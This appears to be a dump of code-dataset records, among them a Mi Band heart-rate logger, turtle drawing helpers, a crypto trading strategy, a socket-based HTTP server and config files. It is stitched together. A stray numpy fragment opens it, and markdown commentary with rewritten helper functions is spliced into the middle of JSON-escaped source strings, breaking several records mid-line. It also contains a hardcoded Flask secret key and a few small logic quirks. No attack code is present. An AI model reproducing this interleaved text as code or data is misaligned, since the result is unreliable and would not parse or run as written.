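sigma = np.array([[100, 30], [30, 140]])

# indexing="ij" reproduces the original p[i][j] layout with point (i, j).
xx, yy = np.meshgrid(np.arange(100), np.arange(100), indexing="ij")
grid = np.stack([xx, yy], axis=-1)               # shape (100, 100, 2)
p = multivariate_normal(mean=mu, cov=sigma).pdf(grid)

# With unit grid spacing over most of the mass, the density sums to ~1.
print(p.shape, p.sum())                           # (100, 100), close to 1.0
```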
Auth Key\nif args.authkey:\n AUTH_KEY = args.authkey\nelif auth_key_from_file:\n AUTH_KEY = auth_key_from_file\nelse:\n print(\"Warning:\")\n print(\" This program requires the auth key. Please put your Auth Key to 'auth_key.txt' or pass the --authkey option with your Auth Key\")\n print()\n exit(1)\n \n# Validate Auth Key\nif AUTH_KEY:\n if 1 < len(AUTH_KEY) != 32:\n print(\"Error:\")\n print(\" Your AUTH KEY length is not 32, please check the format\")\n print(\" Example of the Auth Key: 8fa9b42078627a654d22beff985655db\")\n exit(1)\nelse:\n exit(1)\n\n# Convert Auth Key from hex to byte format\nAUTH_KEY = bytes.fromhex(AUTH_KEY)\n\n# stores the heart rate\nheartLog = []\nbpm = []\nneutralHR = 84\n\n# interval between each heart rate measure\nhrtInterval = 0\n# start time\nstrtTime = 0\n\n# sliding window for analysing data\nwindow = 100\n\n# stores all the clients\nclientList = []\n\n# saves the log\ndef saveLog():\n global heartLog\n \n # writing the heartLog\n with open(args.file, 'w') as csvfile:\n # creating a csv writer object\n csvwriter = csv.writer(csvfile)\n \n # writing the fields\n csvwriter.writerow(['crnt_time', 'interval', 'time', 'bpm', 'data_mean', 'norm_data', 'norm_median', 'data_entropy', 'norm_diff1'])\n \n # writing the data rows\n csvwriter.writerows(heartLog[1:])\n\n\n# functions related to heart rate analysis\ndef EMA(bpm, index, window, factor=0.04):\n if window > index:\n lst = bpm[:index+1]\n else:\n lst = bpm[index - window:index+1]\n\n dat = []\n dat.append(lst[0])\n\n for i in range(1, len(lst)):\n dat.append(factor*lst[i] + (1-factor)*dat[i-1])\n\n return dat[-1]\n\ndef median_hr(bpm, index, window):\n if window > index:\n lst = bpm[:index+1]\n else:\n lst = bpm[index - window:index+1]\n\n n = len(lst)\n lst.sort()\n\n if n % 2 == 0:\n median1 = lst[n//2]\n median2 = lst[n//2 - 1]\n return (median1 + median2)/2\n else:\n return lst[n//2]\n\ndef entropy(bpm, index, window):\n if window > index:\n lst = bpm[:index+1]\n else:\n lst = bpm[index - window:index+1]\n\n ent = 0\n for i in range(len(lst)):\n p = lst.count(lst[i]) / len(lst)\n ent += p * math.log2(p)\n\n return -ent\n\ndef diff1(bpm, index, window):\n if index == 0:\n return bpm[0]\n elif window > index:\n lst = bpm[:index+1]\n else:\n lst = bpm[index - window:index+1]\n \n diff = 0\n for i in range(1, len(lst)):\n diff += abs(lst[i] - lst[i-1])\n\n return diff / (len(lst)-1)\n\n\n\n\n# Needs Auth\ndef get_heart_rate():\n print ('Latest heart rate is : %i' % band.get_heart_rate_one_time())\n input('Press a key to continue')\n\ndef classify(log):\n hr = log[3]\n ent = log[7]\n if hr > 95 and ent > 32:\n return 'STRESS'\n elif hr > 95 and ent < 32:\n return 'EXCITED'\n elif hr < 75 and ent > 32:\n return 'LOW'\n else:\n return 'NORMAL'\n\ndef process_data(data, interval):\n global heartLog, strtTime, window, bpm, neutralHR, clientList\n\n crntTime = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n index = len(heartLog) \n\n data_mean = EMA(bpm, index, window, 0.04)\n norm_data = bpm[index] - neutralHR\n norm_median = median_hr(bpm, index, window) - neutralHR\n data_entropy = entropy(bpm, index, window)\n norm_diff1 = diff1(bpm, index, window)\n\n\n log = [crntTime, interval, time.time() - strtTime, data, data_mean, norm_data, norm_median, data_entropy, norm_diff1]\n heartLog.append(log)\n print(log)\n\n\n # send data to the clients\n if len(clientList) != 0:\n for client in clientList:\n # this is to ensure that even if one of the clients connections is \n # broken, the program continues to 
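On band.py's windowed features: the `entropy` helper calls `lst.count(...)` inside the loop (O(n²) per window) and, because it iterates over *elements* rather than *distinct values*, adds each value's `p·log₂p` term once per occurrence — the result is `-n·Σ p²·log₂p`, not Shannon entropy. A Counter-based version with the conventional definition:

```python
import math
from collections import Counter

def shannon_entropy(window):
    """Shannon entropy (bits) of the value distribution in a window.

    Each distinct value contributes -p*log2(p) exactly once; the loop in
    band.py adds that term once per occurrence, over-weighting repeats.
    """
    n = len(window)
    counts = Counter(window)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())

assert shannon_entropy([1, 1, 2, 2]) == 1.0       # two equally likely values
assert shannon_entropy([7, 7, 7, 7]) == 0.0       # no uncertainty
print(shannon_entropy([60, 62, 62, 64, 64, 64]))  # ~1.46 bits
```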
function.\n try:\n client.sendall(str.encode(classify(log)))\n except BrokenPipeError:\n continue\n\n \n # save the log in intervals so that all data in case of error\n if len(heartLog) % 50 == 0:\n print('saved')\n saveLog()\n\ndef heart_logger(data):\n global hrtInterval, bpm\n\n\n hrtInterval = time.time() - hrtInterval\n bpm.append(data)\n\n # start new thread to process data\n start_new_thread(process_data, (data, hrtInterval,))\n hrtInterval = time.time()\n\n \n\n# Needs Auth\ndef get_realtime():\n band.start_heart_rate_realtime(heart_measure_callback=heart_logger)\n input('Press Enter to continue')\n\n\n\n# adds client to the list\ndef addClient(bandSocket):\n global clientList\n\n for i in range(50):\n # connects to the client and adds them to the clientList\n client, address = bandSocket.accept()\n\n clientList.append(client)\n\n print(f'Connected to client {i} at ' + address[0] + ' : ' + str(address[1]))\n\n\n\n\n# visualization \nbpmPlot = collections.deque(np.zeros(window))\nentPlot = collections.deque(np.zeros(window))\n\n\n# function to update the data\ndef plot_function(bpm, ent):\n # get data\n bpmPlot.popleft()\n bpmPlot.append(bpm)\n entPlot.popleft()\n entPlot.append(ent) \n\n # clear axis\n ax.cla()\n ax1.cla() \n\n # plot heart rate\n ax.plot(bpmPlot)\n ax.scatter(len(bpmPlot)-1, bpmPlot[-1])\n ax.text(len(bpmPlot)-1, bpmPlot[-1]+2, \"{} bpm\".format(bpmPlot[-1]))\n ax.set_ylim(60,130) \n\n # plot entropy\n ax1.plot(entPlot)\n ax1.scatter(len(entPlot)-1, entPlot[-1])\n ax1.text(len(entPlot)-1, entPlot[-1]+2, \"{} bits\".format(entPlot[-1]))\n ax1.set_ylim(0,100)\n\n# define and adjust figure\nfig = plt.figure(figsize=(12,6), facecolor='#DEDEDE')\nax = plt.subplot(121)\nax1 = plt.subplot(122)\nax.set_facecolor('#DEDEDE')\nax1.set_facecolor('#DEDEDE')\n\n\n\n\n\n\n# exception handling\ndef signal_handler(sig, frame):\n print('saving the log')\n saveLog()\n \n print('\\nExiting')\n exit(0)\n\nif __name__ == \"__main__\":\n # ensure that the port number is an integer\n try:\n port = int(args.port)\n except ValueError:\n print(\"error: port number should be an integer\")\n exit(1)\n\n # initialize the socket\n bandSocket = socket.socket()\n\n # try establishing the connection\n try:\n bandSocket.bind((args.host, int(args.port)))\n except socket.error as e:\n print(str(e))\n exit(1)\n\n\n signal.signal(signal.SIGINT, signal_handler)\n\n success = False\n while not success:\n try:\n if (AUTH_KEY):\n band = miband(MAC_ADDR, AUTH_KEY, debug=True)\n success = band.initialize()\n else:\n band = miband(MAC_ADDR, debug=True)\n success = True\n break\n except BTLEDisconnectError:\n print('Connection to the MIBand failed. 
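A dropped client surfaces as `BrokenPipeError` in the broadcast loop above, but the bare `continue` leaves the dead socket in `clientList`, so every subsequent heart-rate sample re-raises against it. Pruning failed connections keeps the list healthy (a sketch of the fix, not the file's code):

```python
def broadcast(client_list, payload: bytes):
    """Send payload to every client, dropping connections that have died."""
    dead = []
    for client in client_list:
        try:
            client.sendall(payload)
        except (BrokenPipeError, ConnectionResetError):
            dead.append(client)
    for client in dead:
        client.close()
        client_list.remove(client)
```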
Trying out again in 3 seconds')\n time.sleep(3)\n continue\n except KeyboardInterrupt:\n print(\"\\nExit.\")\n exit()\n\n \n # listen to the connection requests\n bandSocket.listen()\n\n start_new_thread(addClient, (bandSocket,))\n\n\n # initializing time\n strtTime = hrtInterval = time.time()\n\n start_new_thread(get_realtime, ())\n\n while True:\n if heartLog:\n plot_function(heartLog[-1][3], heartLog[-1][7])\n plt.pause(1)\n\n plt.show()\n","sub_path":"band.py","file_name":"band.py","file_ext":"py","file_size_in_byte":9128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"337517183","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n\n\"\"\"\n\nfrom __future__ import print_function, division\n\nimport math\nimport turtle\n\n# Create square\ndef square(t, length):\n for i in range(4):\n t.fd(length)\n t.lt(90)\n\n# Create polyline\ndef polyline(t, n, length, angle):\n for i in range(n):\n t.fd(length)\n t.lt(angle)\n\n# create polygon\ndef polygon(t, n, length):\n angle = 360.0/n\n polyline(t, n, length, angle)\n\n# create arc\ndef arc(t, r, angle):\n arc_length = 2 * math.pi * r * abs(angle) / 360\n n = int(arc_length / 4) + 3\n step_length = arc_length / n\n step_angle = float(angle) / n\n\n t.lt(step_angle/2)\n polyline(t, n, step_length, step_angle)\n t.rt(step_angle/2)\n\n# create circle\ndef circle(t, r):\n arc(t, r, 360)\n\n\nif __name__ == '__main__':\n bob = turtle.Turtle()\n\n radius = 100\n bob.pu()\n bob.fd(radius)\n bob.lt(90)\n bob.pd()\n circle(bob, radius)\n\n turtle.mainloop()","sub_path":"shapes.py","file_name":"shapes.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"8508463","text":"import random\n\nimport matplotlib.pyplot as plt\nfrom indicators.strategy_indicators import StrategyIndicators\n\nfrom logger import Logger\nfrom trade import Trade\n\n\nclass Strategy(object):\n def __init__(self, pair, capital, client=None, trading_fee=0, stop_loss=0):\n self.output = Logger()\n self.prices = []\n self.closes = [] # Needed for Momentum Indicator\n self.trades = []\n self.sells = []\n self.buys = []\n self.current_price = None\n self.timestamp = None\n self.current_close = None\n self.max_trades_at_once = 1\n self.indicators = StrategyIndicators\n self.profit = 0\n self.pair = pair\n self.reserve = capital\n self.client = client\n self.trading_fee = trading_fee\n self.stop_loss = stop_loss\n\n def tick(self, candlestick):\n op, clos = candlestick.open, candlestick.close\n\n # For backtest history, uniformly sample a random price between the opening and closing\n self.current_price = random.uniform(min(op, clos), max(op, clos))\n\n # Append a timestamp so we can add it to the plot\n self.timestamp = candlestick.time\n\n self.prices.append(self.current_price)\n\n self.evaluate_positions()\n self.update_open_trades()\n\n def live_tick(self, current_price):\n if self.client:\n self.current_price = current_price\n\n self.prices.append(self.current_price)\n\n # Make sure we have enough information to allow our indicators to work properly\n if len(self.prices) < 30:\n return\n\n # Reduce the maximum number of data points in memory to at most 100\n self.prices = self.prices[-100:]\n\n self.evaluate_positions()\n self.update_open_trades()\n\n def evaluate_positions(self):\n rsi = self.indicators.rsi(self.prices)\n nine_period = self.indicators.moving_average(self.prices, 9)\n fifteen_period = 
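On the shapes.py turtle record above: `arc` approximates a circular arc with a polyline — the arc length is 2πr·|angle|/360, chopped into n ≈ arc_length/4 chords (the `+ 3` keeps n sensible for tiny arcs), with a half-step pre-turn so the chord endpoints stay on the circle. The segment arithmetic can be checked without a turtle:

```python
import math

def arc_segments(r, angle):
    """Reproduce the segment count and step sizes chosen by shapes.py."""
    arc_length = 2 * math.pi * r * abs(angle) / 360
    n = int(arc_length / 4) + 3
    return n, arc_length / n, angle / n

n, step_len, step_angle = arc_segments(r=100, angle=90)
print(n, round(step_len, 2), round(step_angle, 2))  # 42 chords, ~3.74 units, ~2.14 deg
# The turns add up to exactly the requested arc angle:
assert math.isclose(n * step_angle, 90)
```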
self.indicators.moving_average(self.prices, 15)\n bb1, bb2 = self.indicators.bollinger_bands(self.prices, k=2.)\n bb_diff = bb1 - bb2\n percent_diff = self.indicators.percent_difference(self.prices)\n # print(percent_diff)\n\n open_trades = [trade for trade in self.trades if trade.status == 'OPEN']\n\n if len(open_trades) < self.max_trades_at_once:\n # if self.current_price < nine_period and self.current_price < fifteen_period and rsi < 40:\n if self.current_price < nine_period and self.current_price < fifteen_period and rsi < 50 and self.current_price < bb1 - 0.8 * bb_diff and percent_diff > 0:\n assert self.reserve > 0\n\n if self.client:\n buy_at = self.current_price + 0.000001\n\n #### USE CLIENT TO SEND API REQUEST TO BUY THE TRADE AT A BIT HIGHER THAN THE LAST PRICE\n # ret = self.client.buy_limit(self.pair, self.reserve / buy_at, buy_at)\n ret = self.client.trade_buy(market=self.pair, order_type=\"MARKET\",\n quantity=self.reserve / self.current_price, time_in_effect=\"FILL_OR_KILL\")\n\n if ret['success'] is True:\n self.output.log(\"Buy order was placed with UUID: \" + ret['result']['uuid'], \"success\")\n new_trade = Trade(self.pair, buy_at, self.reserve, stop_loss=self.stop_loss)\n self.reserve = 0\n self.trades.append(new_trade)\n else:\n self.output.log(\"Buy order was unsuccessful. Reason: \" + ret['message'], \"error\")\n else:\n self.buys.append((self.timestamp, self.current_price))\n new_trade = Trade(self.pair, self.current_price, self.reserve * (1 - self.trading_fee), stop_loss=self.stop_loss)\n self.reserve = 0\n self.trades.append(new_trade)\n\n ### CHECK TO SEE IF WE NEED TO SELL ANY OPEN POSITIONS\n for trade in open_trades:\n if self.current_price > (0.25 * bb_diff) + trade.entry_price or (self.current_price > nine_period and self.current_price > fifteen_period and rsi > 60):\n if self.client:\n\n #### USE CLIENT TO SEND API REQUEST TO CLOSE THE TRADE AT A BIT LOWER THAN THE LAST PRICE\n # ret = self.client.sell_limit(trade.pair, trade.amount, self.current_price - 0.000001)\n ret = self.client.trade_sell(market=trade.pair, order_type=\"MARKET\",\n quantity=trade.amount, time_in_effect=\"FILL_OR_KILL\")\n\n if ret['success'] is True:\n self.output.log(\"Sell order was placed with UUID: \" + ret['result']['uuid'], \"success\")\n profit, total = trade.close(self.current_price)\n self.profit += profit\n self.reserve = total\n else:\n self.output.log(\"Sell order was unsuccessful. Reason: \" + ret['message'], \"error\")\n\n else:\n self.sells.append((self.timestamp, self.current_price))\n profit, total = trade.close(self.current_price)\n self.profit += profit * (1 - self.trading_fee)\n self.reserve = total * (1 - self.trading_fee)\n\n def update_open_trades(self):\n for trade in self.trades:\n\n # Check our stop losses\n if trade.status == \"OPEN\" and trade.stop_loss and self.current_price < trade.stop_loss:\n\n # Use the exchange APIs if we are live with a client\n if self.client:\n\n sell_at = self.current_price - 0.000001\n\n #### USE CLIENT TO SEND API REQUEST TO CLOSE THE STOP LOSS TRADE AT A BIT LOWER THAN THE LAST PRICE\n # ret = self.client.sell_limit(trade.pair, trade.amount, sell_at)\n ret = self.client.trade_sell(market=trade.pair, order_type=\"MARKET\",\n quantity=trade.amount, time_in_effect=\"FILL_OR_KILL\")\n\n if ret['success'] is True:\n self.output.log(\"STOP LOSS! 
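strategy.py's entry and exit rules lean on a StrategyIndicators module that is not part of this record. The Bollinger-band arithmetic those rules assume — middle band = simple moving average, upper/lower = SMA ± k standard deviations — is small enough to restate; this stand-in is a guess at the interface, not the project's actual module:

```python
import statistics

def moving_average(prices, period):
    """Simple moving average of the last `period` prices."""
    window = prices[-period:]
    return sum(window) / len(window)

def bollinger_bands(prices, period=20, k=2.0):
    """Upper and lower Bollinger bands: SMA +/- k population std deviations."""
    window = prices[-period:]
    mid = sum(window) / len(window)
    spread = k * statistics.pstdev(window)
    return mid + spread, mid - spread

prices = [100, 101, 99, 102, 98, 103, 97, 104, 96, 105]
upper, lower = bollinger_bands(prices, period=10, k=2.0)
print(round(upper, 2), round(lower, 2))   # band edges around the mean of 100.5
assert lower < moving_average(prices, 9) < upper
```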
Placed sell order with UUID: \" + ret['result']['uuid'], \"error\")\n profit, total = trade.close(sell_at)\n self.profit += profit * (1 - self.trading_fee)\n self.reserve = total * (1 - self.trading_fee)\n else:\n self.output.log(\"Sell order was unsuccessful. Reason: \" + ret['message'], \"error\")\n else:\n profit, total = trade.close(self.current_price)\n self.sells.append((self.timestamp, self.current_price))\n # self.output.log(\"STOP LOSS! Closed Trade at \" + str(self.current_price) + \" BTC. Profit: \" + str(profit) + \", BTC: \" + str(total), \"error\")\n self.profit += profit * (1 - self.trading_fee)\n self.reserve = total * (1 - self.trading_fee)\n\n def show_positions(self):\n for trade in self.trades:\n trade.show_trade()\n\n def plot_buys(self):\n for timestamp, price in self.buys:\n plt.plot(timestamp, price, 'gx')\n\n def plot_sells(self):\n for timestamp, price in self.sells:\n plt.plot(timestamp, price, 'rx')\n\nfrom indicators.backtesting_indicators import BacktestingIndicators\nfrom decision import Decision\n\n'''\nBackTesting Strategy\n'''\nclass BacktestingStrategy(object):\n def __init__(self, pair, capital, buy_strategy, sell_strategy, trading_fee=0, stop_loss=0):\n self.output = Logger()\n self.prices = []\n self.trades = []\n self.sells = []\n self.buys = []\n self.max_trades_at_once = 1\n self.indicators = BacktestingIndicators\n self.profit = 0\n self.pair = pair\n self.reserve = capital\n self.buy_strategy = buy_strategy\n self.sell_stategy = sell_strategy\n self.trading_fee = trading_fee\n self.stop_loss = stop_loss\n\n '''\n Runs our backtesting strategy on the set of backtesting candlestick data\n '''\n def run(self, candlesticks):\n\n # Samples a random price within the range [candlestick.open, candlestick.close]\n sample_price = lambda op, close: random.uniform(min(op, close), max(op, close))\n\n self.prices = [sample_price(candle.open, candle.close) for candle in candlesticks]\n\n rsi = self.indicators.historical_rsi(self.prices)\n nine_period = self.indicators.historical_moving_average(self.prices, 9)\n fifteen_period = self.indicators.historical_moving_average(self.prices, 15)\n bb1, bb2 = self.indicators.historical_bollinger_bands(self.prices)\n bb_diff = bb1 - bb2\n\n\n for i in range(len(self.prices)):\n\n decision = Decision({'currentprice': self.prices[i], 'rsi': rsi[i], 'movingaverage9': nine_period[i], 'movingaverage15': fifteen_period[i]})\n\n open_trades = [trade for trade in self.trades if trade.status == 'OPEN']\n\n ### CHECK TO SEE IF WE CAN OPEN A BUY POSITION\n if len(open_trades) < self.max_trades_at_once:\n if decision.should_buy(self.buy_strategy):\n assert self.reserve > 0\n\n self.buys.append((i, self.prices[i]))\n new_trade = Trade(self.pair, self.prices[i], self.reserve * (1 - self.trading_fee),\n stop_loss=self.stop_loss)\n self.reserve = 0\n self.trades.append(new_trade)\n\n ### CHECK TO SEE IF WE NEED TO SELL ANY OPEN POSITIONS\n for trade in open_trades:\n if decision.should_sell(self.sell_stategy):\n\n self.sells.append((i, self.prices[i]))\n profit, total = trade.close(self.prices[i])\n self.profit += profit * (1 - self.trading_fee)\n self.reserve = total * (1 - self.trading_fee)\n\n ### CHECK TO SEE IF WE HAVE ACTIVATED A STOP LOSS\n for trade in self.trades:\n\n # Check our stop losses\n if trade.status == \"OPEN\" and trade.stop_loss and self.prices[i] < trade.stop_loss:\n profit, total = trade.close(self.prices[i])\n self.sells.append((i, self.prices[i]))\n self.profit += profit * (1 - self.trading_fee)\n self.reserve = 
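Both strategy classes also construct Trade objects from an unshown trade.py. From the call sites — `Trade(pair, entry_price, capital, stop_loss=...)`, `trade.close(price)` returning `(profit, total)`, plus the `.status`, `.amount`, `.entry_price`, and `.stop_loss` attributes — a minimal reconstruction looks like the following (an inference, not the original file):

```python
class Trade:
    """Minimal stand-in inferred from how strategy.py uses trade.py."""

    def __init__(self, pair, entry_price, capital, stop_loss=0):
        self.pair = pair
        self.entry_price = entry_price
        self.amount = capital / entry_price             # units bought
        # Stop-loss interpreted as a fraction below the entry price.
        self.stop_loss = entry_price * (1 - stop_loss) if stop_loss else None
        self.status = "OPEN"

    def close(self, exit_price):
        """Close the position; return (profit, total proceeds) in quote currency."""
        self.status = "CLOSED"
        total = self.amount * exit_price
        profit = self.amount * (exit_price - self.entry_price)
        return profit, total

    def show_trade(self):
        print(f"{self.pair}: {self.status} @ {self.entry_price:.6f}")

t = Trade("BTC-LTC", entry_price=0.02, capital=1.0, stop_loss=0.05)
profit, total = t.close(0.022)
print(round(profit, 4), round(total, 4))  # 0.1 profit on 1.1 total proceeds
```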
total * (1 - self.trading_fee)\n\n def show_positions(self):\n for trade in self.trades:\n trade.show_trade()\n","sub_path":"backend/bot/strategy.py","file_name":"strategy.py","file_ext":"py","file_size_in_byte":10780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"633135593","text":"\"\"\"参数管理\"\"\"\n\nfrom src.commons.model_resource import MongoModelResource\nfrom src.models import BlackWhiteList\n\n\nclass BlackWhiteListAPI(MongoModelResource):\n \"\"\"通用参数字典\"\"\"\n\n model = BlackWhiteList\n filter_fields = [\n [\"product\", \"==\", \"product\", str],\n [\"list_type\", \"==\", \"list_type\", str],\n [\"data\", \"==\", \"data\", str],\n [\"is_allow\", \"==\", \"is_allow\", bool],\n ]\n","sub_path":"xxw/fraud_api/src/modules/black_white_list.py","file_name":"black_white_list.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"347192441","text":"def count_vowels(word):\n vowels = 'aeiou'\n total = 0\n for vowel in vowels:\n total += word.count(vowel)\n\n return total\n\nprint(count_vowels('apple'))\nprint(count_vowels('banana'))\n\n\n\n#2번\n# (4번) -> 오류가 발생 안함, 공백 제거\n\n\n#3번\n#이중 포문\ndef only_square_area(value1, value2):\n area_list = []\n for v1 in value1:\n for v2 in value2:\n if v1 == v2:\n area_list.append(v1**2)\n \n return area_list\n\nprint(only_square_area([32,55,63],[13,32,42,55]))\n\n# list comprehension\n # area_list = [v1**2 for v1 in value1 for v2 in value2 if v1 == v2]\n\n # return area_list\n\n\n\ndef get_dict_avg(score_dict):\n return sum(score_dict.values()) / len(score_dict)\n\n# total = 0\n# length = 0\n# for score in score_dict.values():\n# total += score\n# length += 1\n\n# return total / length\n\navg = get_dict_avg({\n 'python': 80,\n 'algorithm': 90,\n 'django': 89,\n 'web': 83,\n})\nprint(avg)\n\n\n\ndef count_blood(blood_list):\n blood_dict = {}\n #1\n # for blood in blood_list:\n # if blood_dict.get(blood):\n # blood_dict[blood] += 1\n # else:\n # blood_dict[blood] = 1\n\n\n #2\n for blood in blood_list:\n blood_dict[blood] = blood_dict.get(blood, 0) + 1\n\n\n return blood_dict\n\nresult = count_blood([\n 'A','B','A','O','AB','AB',\n 'O','A','B','O','B','AB',\n])\nprint(count_blood(result))\n\n\n\n\n","sub_path":"trainning/0726hwsans.py","file_name":"0726hwsans.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"470121272","text":"import os\nfrom xml.etree import cElementTree as ET\n\nfrom malcolm.compat import et_to_string\nfrom malcolm.core import REQUIRED, method_takes\nfrom malcolm.core.vmetas import StringMeta\nfrom malcolm.parts.builtin.childpart import ChildPart\nfrom malcolm.controllers.runnablecontroller import RunnableController\nfrom malcolm.parts.ADCore.hdfwriterpart import CalculatedNDAttributeDatasetInfo\n\n\nclass StatsPluginPart(ChildPart):\n\n @RunnableController.ReportStatus\n def report_info(self, _):\n return [CalculatedNDAttributeDatasetInfo(name=\"sum\", attr=\"StatsTotal\")]\n\n def _make_attributes_xml(self):\n # Make a root element with an NXEntry\n root_el = ET.Element(\"Attributes\")\n ET.SubElement(\n root_el, \"Attribute\", addr=\"0\", datatype=\"DOUBLE\", type=\"PARAM\",\n description=\"Sum of the array\", name=\"StatsTotal\", source=\"TOTAL\",\n )\n xml = et_to_string(root_el)\n return xml\n\n @RunnableController.Configure\n @method_takes(\n \"filePath\", StringMeta(\"File path to 
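The practice snippets in the 0726hwsans.py record above hand-roll frequency counting and averaging; the standard library already covers both:

```python
from collections import Counter
from statistics import mean

bloods = ['A', 'B', 'A', 'O', 'AB', 'AB', 'O', 'A', 'B', 'O', 'B', 'AB']
print(Counter(bloods))        # Counter({'A': 3, 'B': 3, 'O': 3, 'AB': 3})

scores = {'python': 80, 'algorithm': 90, 'django': 89, 'web': 83}
print(mean(scores.values()))  # 85.5
```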
write data to\"), REQUIRED)\n def configure(self, task, completed_steps, steps_to_do, part_info, params):\n file_dir, filename = params.filePath.rsplit(os.sep, 1)\n fs = task.put_many_async(self.child, dict(\n enableCallbacks=True,\n computeStatistics=True))\n xml = self._make_attributes_xml()\n attributes_filename = os.path.join(\n file_dir, \"%s-attributes.xml\" % self.params.mri)\n open(attributes_filename, \"w\").write(xml)\n fs += task.put_async(self.child[\"attributesFile\"], attributes_filename)\n task.wait_all(fs)\n","sub_path":"malcolm/parts/ADCore/statspluginpart.py","file_name":"statspluginpart.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"352585186","text":"import os\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\nDEBUG = False\nDATABASE = 'vendor_portal.db'\nWTF_CSRF_ENABLED = True\nSECRET_KEY = 'my_precious'\nPOSTS_PER_PAGE = 40\n# define the full path of the database\nDATABASE_PATH = os.path.join(basedir, DATABASE)\nSQLALCHEMY_DATABASE_URI = 'sqlite:///' + DATABASE_PATH\n\nMAX_SEARCH_RESULTS = 50\n\nINVENTORY_FILES = os.path.realpath('project/INVENTORY_FILES/')\nUPLOADED_FILES = os.path.realpath('project/UPLOADED_FILES/')\nMASTER_INVENTORY = os.path.realpath('project/MASTER_INVENTORY/')\n\nALLOWED_EXTENSIONS = set(['csv',])","sub_path":"project/_config.py","file_name":"_config.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"313056332","text":"import socket\r\nimport tkinter as tk\r\nimport keyboard\r\n\r\nhosting = False\r\n\r\ndefport = 80\r\n\r\ndefhtml = \"\"\"\r\n\r\n\r\n!!TITLE!!\r\n\r\n\r\n!!BODY!!\r\n\r\n\"\"\"\r\n\r\ndef compilecode(title, body, font=\"Arial\"):\r\n print(\"Compiling...\")\r\n return bytes(defhtml.replace(\"!!TITLE!!\", title).replace(\"!!BODY!!\", body).replace(\"!!FONT!!\", font), \"UTF-8\")\r\n\r\nhtml = compilecode(\"AC88 Web\",\r\n \"

AC88 Web<br>Error 204<br>This site has been started without any code. If you are the developer please check your website editor.

\")\r\n\r\ndef run(port, html, onlylh=False):\r\n if not type(html)==bytes:\r\n print(\"Expected html in b'' not ''\")\r\n return\r\n sock = socket.socket()\r\n sock.bind(('', port))\r\n print(\"Waiting for client...\")\r\n sock.listen(5)\r\n client, address = sock.accept()\r\n print(\"Incoming:\", address)\r\n if not address[0]==\"127.0.0.1\" and onlylh:\r\n print(\"Aborting run. Non-localhost user requested.\")\r\n return\r\n print(client.recv(1024))\r\n print()\r\n client.send(b'HTTP/1.0 200 OK\\r\\n')\r\n client.send(b\"Content-Type: text/html\\r\\n\\r\\n\")\r\n client.send(html)\r\n client.close()\r\n print(\"Answering ...\")\r\n print(\"Finished.\")\r\n sock.close()\r\n\r\ndef aborthost(e=\"\"):\r\n print(\"Aborting host...\")\r\n global hosting\r\n keyboard.unhook_all()\r\n hosting = False\r\n\r\ndef host(port, html, ek=\"h\"):\r\n print(\"Hosting...\")\r\n global hosting\r\n hosting = True\r\n if not ek==None:\r\n keyboard.on_press_key(\"h\", aborthost)\r\n while hosting:\r\n run(port, html)\r\n","sub_path":"ac88web/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"349627216","text":"__author__ = [\"Francisco Clavero\"]\n__email__ = [\"fcoclavero32@gmail.com\"]\n__status__ = \"Prototype\"\n\n\n\"\"\" Project settings and parameters. \"\"\"\n\n\nimport os\n\nfrom dotenv import load_dotenv\n\n\nload_dotenv()\n\ntry:\n ROOT_DIR = os.environ[\"ROOT_DIR\"]\nexcept KeyError:\n ROOT_DIR = os.path.dirname(os.path.realpath(__file__))\n\nCHECKPOINT_NAME_FORMAT = \"%y-%m-%dT%H-%M\"\n\nDATA_DIR = os.environ[\"DATA_DIR\"]\n\nDATA_SOURCES = {\n \"sketchy-photos\": {\n \"root\": os.path.join(DATA_DIR, \"sketchy\"),\n \"images\": os.path.join(DATA_DIR, \"sketchy\", \"photo\", \"tx_000000000000\"), # 12500\n \"dimensions\": (256, 256),\n \"language\": \"en\",\n },\n \"sketchy-sketches\": {\n \"root\": os.path.join(DATA_DIR, \"sketchy\"),\n \"images\": os.path.join(DATA_DIR, \"sketchy\", \"sketch\", \"tx_000000000000\"), # 75481\n \"dimensions\": (256, 256),\n \"language\": \"en\",\n },\n \"sketchy-test-photos\": {\n \"root\": os.path.join(DATA_DIR, \"sketchy_test\"),\n \"images\": os.path.join(DATA_DIR, \"sketchy_test_multimodal\", \"photo\"), # 1250\n \"dimensions\": (256, 256),\n \"language\": \"en\",\n },\n \"sketchy-test-photos-multimodal\": {\n \"root\": os.path.join(DATA_DIR, \"sketchy_test_multimodal\"),\n \"images\": os.path.join(DATA_DIR, \"sketchy_test_multimodal\", \"photo\"), # 1250\n \"dimensions\": (256, 256),\n \"language\": \"en\",\n },\n \"sketchy-test-sketches\": {\n \"root\": os.path.join(DATA_DIR, \"sketchy_test\"),\n \"images\": os.path.join(DATA_DIR, \"sketchy_test_multimodal\", \"sketch\"), # 1250\n \"dimensions\": (256, 256),\n \"language\": \"en\",\n },\n \"sketchy-test-sketches-multimodal\": {\n \"root\": os.path.join(DATA_DIR, \"sketchy_test_multimodal\"),\n \"images\": os.path.join(DATA_DIR, \"sketchy_test_multimodal\", \"sketch\"), # 1250\n \"dimensions\": (256, 256),\n \"language\": \"en\",\n },\n \"sample_vectors\": {\"pickle\": os.path.join(DATA_DIR, \"sample-vectors.pickle\"), 